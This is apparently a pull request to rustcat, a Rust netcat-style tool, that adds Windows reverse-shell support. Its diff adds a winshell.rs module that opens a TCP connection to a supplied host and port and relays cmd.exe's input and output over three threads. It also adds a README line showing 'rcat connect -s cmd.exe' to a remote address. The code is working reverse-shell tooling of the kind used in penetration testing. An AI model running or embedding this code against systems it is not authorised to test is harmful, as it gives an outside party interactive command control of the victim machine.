### PR TITLE
Add support for Windows reverse shell

### DIFF
--- a/README.md
+++ b/README.md
@@ -36,6 +36,10 @@ and to connect:
 ```
 rcat connect -s bash the.0.0.ip 55600
 ```
+Reverse shell from Windows:
+```
+rcat connect -s cmd.exe the.0.0.ip 55600
+```
 
 For some more basic usage, check [here](https://github.com/robiot/rustcat/wiki/Basic-Usage)
 

--- a/src/main.rs
+++ b/src/main.rs
@@ -11,6 +11,9 @@ mod listener;
 #[cfg(unix)]
 mod unixshell;
 
+#[cfg(windows)]
+mod winshell;
+
 fn host_from_opts(host: Vec<String>) -> Result<(String, String), String> {
     let fixed_host = if host.len() == 1 {
         ("0.0.0.0".to_string(), host.get(0).unwrap().to_string()) // Safe to unwrap here
@@ -101,7 +104,12 @@ fn main() {
                 log::error!("{}", err);
             }
 
-            #[cfg(not(unix))]
+            #[cfg(windows)]
+            if let Err(err) = winshell::shell(host, port, shell) {
+                log::error!("{}", err);
+            }
+
+            #[cfg(not(any(unix, windows)))]
             {
                 log::error!("This feature is not supported on your platform");
             }

--- a/src/winshell.rs
+++ b/src/winshell.rs
@@ -1,0 +1,40 @@
+use std::io::{copy, Result};
+use std::net::TcpStream;
+use std::process::{Command, Stdio};
+use std::thread;
+
+pub(crate) fn shell(host: String, port: String, shell: String) -> Result<()> {
+    let mut sock_write = TcpStream::connect(format!("{}:{}", host, port))?;
+    // sock_write.set_nonblocking(false)?;
+    let mut sock_write_err = sock_write.try_clone()?;
+    let mut sock_read = sock_write.try_clone()?;
+
+    // Open shell
+    let mut child = Command::new(shell)
+        .arg("-i")
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()?;
+
+    let mut stdin = child.stdin.take().expect("Failed to open stdin");
+    let mut stdout = child.stdout.take().expect("Failed to open stdout");
+    let mut stderr = child.stderr.take().expect("Failed to open stderr");
+
+    //FIXME: Use async IO if possible
+    thread::spawn(move || {
+        copy(&mut stdout, &mut sock_write).expect("stdout closed");
+    });
+    thread::spawn(move || {
+        copy(&mut stderr, &mut sock_write_err).expect("stderr closed");
+    });
+    thread::spawn(move || {
+        copy(&mut sock_read, &mut stdin).expect("stdin closed");
+    });
+
+    child.wait()?;
+
+    log::warn!("Shell exited");
+
+    Ok(())
+}


### PR DESCRIPTION
Ideally, we should use async IO libraries such as [tokio-rs/mio](https://github.com/tokio-rs/mio). However, async IO support is lacking for Windows in mio and other rust crates. Hence, used 3 worker threads to move data between shell's pipes and TCP socket.

closes #21 